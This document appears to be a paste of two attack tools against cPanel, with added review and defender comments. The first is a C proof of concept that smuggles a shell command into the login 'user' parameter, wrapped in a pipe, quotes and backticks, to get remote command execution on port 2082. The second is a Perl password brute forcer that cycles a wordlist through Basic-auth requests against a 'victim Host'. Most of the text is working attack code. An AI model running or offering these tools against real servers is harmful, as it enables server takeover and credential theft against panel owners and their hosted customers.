- /*
- cPanel <= 9x Remote Command Execution
- //headers
- #include //In/Out
- #include //sockets functions
- #include //memory functions
- #include //strlen,strcat,strcpy
- #pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"
- #define Port 2082 //port for connect to cPanel
- #define SIZE 1024 //buffer size to receive the data
- /*connect host:port*/
- SOCKET Conecta(char *Host, short puerto)
- {
- /* Open a TCP connection to Host:puerto with Winsock and return the
-  * connected socket, or -1 if the socket cannot be created or the
-  * connect fails.
-  * NOTE(review): the WSAStartup() result is not checked, Ip is
-  * dereferenced without a NULL check after gethostbyname(), and the
-  * failure path after WSAConnect() never calls closesocket(). */
- WSADATA wsaData;
- SOCKET Winsock;//client socket used for the outbound connection
- /*address structure for the peer and the resolver result*/
- struct sockaddr_in Winsock_In;
- struct hostent *Ip;
- /*initialise Winsock, requesting version 2.2*/
- WSAStartup(MAKEWORD(2,2), &wsaData);
- /*create a TCP stream socket*/
- Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
- //check socket status
- if(Winsock==INVALID_SOCKET)
- {
- /*socket creation failed: release Winsock and report failure*/
- WSACleanup();
- return -1;
- }
- /* Resolve the host name and fill in the peer address; the resolved
-  * address is converted to text by inet_ntoa() and back by inet_addr(). */
- Ip=gethostbyname(Host);
- Winsock_In.sin_port=htons(puerto);
- Winsock_In.sin_family=AF_INET;
- Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
- /*connect to the peer*/
- if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
- {
- /*connect failed: release Winsock and report failure*/
- WSACleanup();
- return -1;
- }
- return Winsock;
- }
- /*MASTER FUNCTION*/
- int main(int argc, char *argv[])
- {
- /* Proof-of-concept client for the cPanel login issue named in the banner:
-  * takes a host (argv[1]) and a string (argv[2]), sends one GET to port
-  * 2082 with that string placed in the "user" query parameter, and prints
-  * up to SIZE bytes of the reply. Returns 0 on a usage error or on
-  * completion, 1 if the connection fails. */
- SOCKET sock;
- /* Fixed halves of the request line. %22 is a double quote and %60 a
-  * backtick, so argv[2] arrives in the user parameter wrapped in quotes
-  * and backticks after a leading pipe.
-  * Defender note: a /login/ request whose user value carries a pipe or
-  * %60 is the pattern to match in access logs or a request filter.
-  * Presumably the affected versions hand this value to a shell, so the
-  * durable fix is upgrading the panel rather than filtering alone. */
- char evil_request[]="GET /login/?user=|%22%60";
- char evil_request2[]="%60%22\r";
- char *evil;
- /* Reply buffer; see the recv() note below on how it is terminated. */
- char buf[SIZE];
- printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
- printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
- printf("\n-----------------------------------------------------\n");
- if(argc!=3)//requires exactly two arguments after the program name
- {
- printf("\n[+] Usage: %s \n",argv[0]);
- return 0;
- }
- printf("\n[+] Connecting %s:%d...",argv[1],Port);
- /*open the TCP connection to the panel port*/
- sock=Conecta(argv[1],Port);//returns -1 on failure
- if(sock==-1)
- {
- printf("Error\n");
- return 1;
- }
- printf("OK");
- /* Allocation covers the 24-byte prefix, argv[2], and 12 bytes for the
-  * 7-byte suffix, the trailing "\n\n" and the terminator.
-  * NOTE(review): the malloc() result is not checked before use. */
- evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
- strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");
- /* Send the request line as built (no HTTP version or headers), then read
-  * a single reply chunk. NOTE(review): recv() may return SIZE, which puts
-  * the terminator one byte past buf, or SOCKET_ERROR, which indexes
-  * before it; neither result is checked, and send() is not checked. */
- send(sock,evil,strlen(evil),0);
- buf[recv(sock,buf,SIZE,0)]='\0';
- /* Print the reply. NOTE(review): the cleanup below passes a stack array
-  * and a malloc() pointer to LocalFree(), which is meant for LocalAlloc()
-  * memory, and the socket is never closed with closesocket(). */
- printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);
- WSACleanup();
- LocalFree(buf);
- LocalFree(evil);
- return 0;
- }
- #!/usr/bin/perl
- # Cpanel Password Brute Forcer
- # —————————-
- # (c)jos_ali_joe
- # Perl Version ( low speed )
- # Original Advisory :
- use IO :: Socket ;
- use LWP :: Simple ;
- use MIME :: Base64 ;
- $host = $ARGV [ 0 ]; # host name of the panel, per the usage text
- $user = $ARGV [ 1 ]; # account name used in every attempt
- $port = $ARGV [ 2 ]; # panel port; the usage text gives 2082, the plain-HTTP port
- $list = $ARGV [ 3 ]; # path of the password list file
- $file = $ARGV [ 4 ]; # output file per the usage text; never opened or written in the visible code
- $url = “http://” . $host . “:” . $port ; # built here but not used in the visible code
- if(@ ARGV < 3 ){ # usage banner is shown for fewer than three arguments, although $list is read from the fourth
- print q (
- ###############################################################
- # Cpanel Password Brute Force Tool #
- ###############################################################
- # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
- #————————————————————-#
- # [Host] : victim Host (simorgh-ev.com) #
- # [User] : User Name (demo) #
- # [PORT] : Port of Cpanel (2082) #
- #[list] : File Of password list (list.txt) #
- # [File] : file for save password (password.txt) #
- # #
- ###############################################################
- # (c)jos_ali_joe / Indonesian Coder #
- ###############################################################
- );exit;}
- headx (); # runs the whole attempt loop defined in sub headx
- $numstart = “-1″ ; # assigned after headx returns; not read anywhere in the visible code
- sub headx () { # Prints the banner, loads the password list, and calls brut once per line.
- print q (
- ###############################################################
- # Cpanel Password Brute Force Tool #
- # (c)jos_ali_joe / Indonesian Coder #
- ###############################################################
- );
- open ( PASSFILE , “<$list” ) || die “[-] Can’t open the List of password file !” ; # two-argument open on a value taken from the command line
- @ PASSWORDS = < PASSFILE >; # the whole list is read into memory at once
- close PASSFILE ;
- foreach my $P (@ PASSWORDS ) { # one attempt per list entry, in file order, with no delay between attempts
- chomp $P ;
- $passwd = $P ; # handed to brut through the package global $passwd
- print ”
- [~] Try Password : $passwd
- ” ;
- & brut ; # brut takes no arguments; it reads $user and $passwd as globals
- };
- }
- sub brut () { # One login attempt: sends GET / with an HTTP Basic Authorization header built from the globals $user and $passwd.
- $authx = encode_base64 ( $user . “:” . $passwd ); # Basic auth is base64 of user:password, an encoding and not encryption
- print $authx ; # echoes the encoded credential to stdout
- my $sock = IO :: Socket :: INET -> new ( Proto => “tcp” , PeerAddr => “$host” , PeerPort => “$port” ) || print ”
- [-] Can not connect to the host” ;
- print $sock “GET / HTTP/1.1
- ” ;
- print $sock “Authorization: Basic $authx
- ” ;
- print $sock “Connection: Close
- ” ;
- read $sock , $answer , 128 ; # only the first 128 bytes of the reply are examined
- close ( $sock ); # a fresh connection is opened for every attempt
- if ( $answer =~ / Moved /) { # a reply matching this pattern (presumably a redirect status line) is taken as a successful login
- print ”
- [~] PASSWORD FOUND : $passwd
- ” ;
- exit(); # stops at the first match. Defender view: one source sending a long run of failed Basic-auth requests to the panel port is what lockout and rate limiting (cPHulk on cPanel) are meant to stop.
- }
- }